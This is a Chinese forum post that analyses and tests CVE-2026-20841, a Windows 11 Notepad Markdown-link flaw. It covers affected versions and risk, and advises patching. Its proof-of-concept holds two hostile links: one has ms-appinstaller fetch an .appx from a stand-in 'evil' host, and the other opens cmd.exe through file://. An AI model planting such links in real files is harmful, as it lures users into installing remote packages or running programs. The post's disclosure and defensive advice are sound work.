找回密码
立即注册
搜索
热搜: Java Python Linux Go
发回帖 发新帖

3790

积分

1

好友

525

主题
发表于 昨天 09:20 | 查看: 6| 回复: 0

最近关于Windows自带记事本存在一个高危漏洞、能劫持电脑的说法流传很广。我特意去研究了一下,并进行了实际测试,发现这个漏洞虽然CVSS评分高达7.8,被评定为“高危”,但其实际触发条件相当苛刻,并没有传言中那么可怕。

这个漏洞编号为 CVE-2026-20841,是一个远程代码执行(Remote Code Execution)漏洞。它的攻击原理是:攻击者可以构造一个包含恶意链接的Markdown文件,并诱骗用户用受影响的记事本版本打开。当用户在记事本中按住Ctrl键并点击该恶意链接时,记事本会直接调用系统默认的协议处理器,从而可能在未经用户二次确认的情况下,静默加载并执行恶意代码。理论上,这可能导致攻击者获取电脑控制权,进行文件篡改、信息窃取等操作。

CVE-2026-20841的CVSS评分详情

漏洞影响版本

首先需要明确,并非所有记事本版本都受影响。该漏洞仅影响版本号在 11.0.0 至 11.2510 之间的记事本。

漏洞影响的版本范围

攻击原理与PoC

漏洞的核心在于记事本对Markdown链接的处理逻辑存在缺陷。一个简单的概念验证(PoC)文件内容可能如下所示:

# install file
[poc](ms-appinstaller://?source=https://evil/xxx.appx)
# run executable file
[poc](file://C:/windows/system32/cmd.exe)

包含恶意链接的Markdown文件内容

实测复现过程

为了验证,我测试了自己电脑上的记事本。最初使用的是11.2312.18.0版本,但无法复现,因为这个旧版本并未包含相关的Markdown语法渲染功能。

将记事本更新到受影响的 11.2510.14.0 版本后,便可以复现。打开上述PoC文件,按住Ctrl键并单击链接。

在更新后的记事本中打开PoC文件

已打补丁的版本中,点击后会先弹出一个系统安全警告,询问用户是否允许运行。确认后,才会弹出CMD窗口。这是修复后的行为。

重要提示:在未修复的漏洞版本中,这个过程是静默的,不会弹出任何提醒,恶意代码会被直接执行。

点击链接后弹出的系统警告及CMD执行结果

风险评估

综合来看,这个漏洞的实际风险被高估了。这是一个典型的 社会工程学 与软件逻辑缺陷结合的案例。虽然理论危害等级高,但无需过度恐慌,原因如下:

  1. 影响范围窄:仅涉及特定版本的Windows 11记事本应用。
  2. 触发条件苛刻:需要同时满足多个条件——用户下载了恶意的.md文件、使用受影响版本的记事本打开、并且主动按住Ctrl键点击链接。缺少任何一步攻击都无法成功。
  3. 依赖用户交互:攻击链的起点是欺骗用户打开一个来源不明的文件,这本身就是一次 社会工程学 攻击。

修复建议

微软已于2026年2月11日发布了安全更新,并在2月22日推送了包含修复程序的最新版本。

  1. 立即更新:通过 Windows Update 将系统及所有应用更新至最新版本,这是最直接有效的防御方法。
  2. 保持警惕:不要随意打开来源不明的Markdown(.md)文件。
  3. 注意提示:在 Win11系统 中点击任何链接时,注意观察系统是否会弹出协议确认对话框,对未预期的警告保持警惕。

微软官方发布的安全更新公告

Microsoft Store中的记事本最新版本信息

参考链接

希望这次实际的漏洞实测与分析,能帮助大家更理性地看待安全威胁,掌握正确的应对方法。安全问题的核心往往在于及时的更新和良好的使用习惯。




上一篇:揭秘资深程序员的“防御性混沌编程”:用自毁武功对抗AI替代
下一篇:唤醒抽屉里的小米1S与红米Note,重温Android刷机与MIUI的黄金时代
您需要登录后才可以回帖 登录 | 立即注册

手机版|小黑屋|网站地图|云栈社区 ( 苏ICP备2022046150号-2 )

GMT+8, 2026-2-25 09:10 , Processed in 0.404582 second(s), 43 queries , Gzip On.

Powered by Discuz! X3.5

© 2025-2026 云栈社区.

快速回复 返回顶部 返回列表